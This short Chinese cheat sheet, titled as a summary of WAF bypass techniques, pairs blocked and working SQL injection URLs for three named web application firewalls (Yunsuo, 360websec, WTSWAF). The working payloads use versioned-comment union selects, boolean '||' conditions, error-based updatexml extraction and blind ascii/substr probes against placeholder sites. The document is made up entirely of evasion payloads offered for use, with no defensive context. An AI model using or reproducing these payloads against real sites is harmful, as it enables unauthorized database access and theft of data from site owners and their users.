绕WAF手法总结
云锁
被拦截
http://www.test123.com/article.php?id=1%20union%20select%201,2,3
绕过
http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()
360websec
被拦截
http://www.xxx.com.cn/productshow.php?id=79'
绕过
http://www.xxx.com.cn/productshow.php?id=79%20||%201=1
WTSWAF
被拦截
http://www.xxx.com.cn/productshow.php?id=-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)
绕过
http://www.xxx.com.cn/productshow.php?id=-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)